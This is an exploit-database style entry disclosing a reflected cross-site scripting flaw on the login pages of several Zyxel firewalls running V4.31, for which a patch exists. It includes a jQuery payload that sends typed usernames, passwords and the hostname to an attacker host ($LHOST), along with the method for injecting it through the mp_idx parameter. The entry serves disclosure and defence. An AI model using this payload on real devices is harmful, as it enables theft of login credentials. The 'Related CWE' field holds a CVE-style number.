vendor:
ZyWall 310, ZyWall 110, USG1900, ATP500, USG40
by:
Aaron Bishop
6.1
CVSS
MEDIUM
Reflected Cross-Site Scripting
79
CWE
Product Name: ZyWall 310, ZyWall 110, USG1900, ATP500, USG40
Affected Version From: V4.31
Affected Version To: V4.31
Patch Exists: YES
Related CWE: 2019-9955
CPE: h:zyxel:zywall_310
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: weblogin.cgi, webauth_relogin.cgi
2019
Reflected XSS on Zyxel login pages
Several Zyxel devices are vulnerable to a reflected Cross-Site Scripting via the mp_idx parameter on weblogin.cgi and webauth_relogin.cgi. Host a malicious file JavaScript file named 'z', or any other single character, locally. The contents of 'z' for the following example are: $('button').click(function() { $.get('//$LHOST', { username: $('input:text').val(), password: $('input:password').val(), host: location.hostname}); }); Close the mp_idx variable with '; and Use the getScript functionality of jQuery to include the malicious file.
Mitigation:
Ensure that user input is properly sanitized and validated before being used in web applications.